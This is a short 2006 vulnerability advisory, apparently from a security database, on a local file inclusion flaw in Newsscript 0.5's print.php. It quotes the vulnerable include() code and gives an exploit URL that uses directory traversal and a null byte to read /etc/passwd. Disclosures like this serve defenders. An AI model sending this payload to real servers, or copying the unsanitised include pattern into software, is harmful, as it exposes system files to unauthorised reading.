Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14251
HistorySep 13, 2006 - 12:00 a.m.

Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability

2006-09-1300:00:00
vulners.com
18

Subject:

— "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "

Vulnerable version:

— "Newsscript version 0.5"

Vendor URL:

— Emaill - [email protected]
— Website - http://webmaster-journal.com

Available in:

http://www.comscripts.com/scripts/php.wm-news.203.html

Vulnerability:

— Vulnerable code in print/print.php

— $ide var is not sanitized and can be used to include files from local resources

— 1 <html>
— 2 <head>
— 3 <?
— 4 $file_name = "…/".$ide.".txt";
— 5 ?>


— 27 include($file_name);

Exploit:

http://localhost/newscript/print/print.php?ide=../../../../etc/passwd&#37;00

Discovered By:

— Daftrix[at]Gmail.com
— Daftrix Security Investigations
http://www.daftrix.com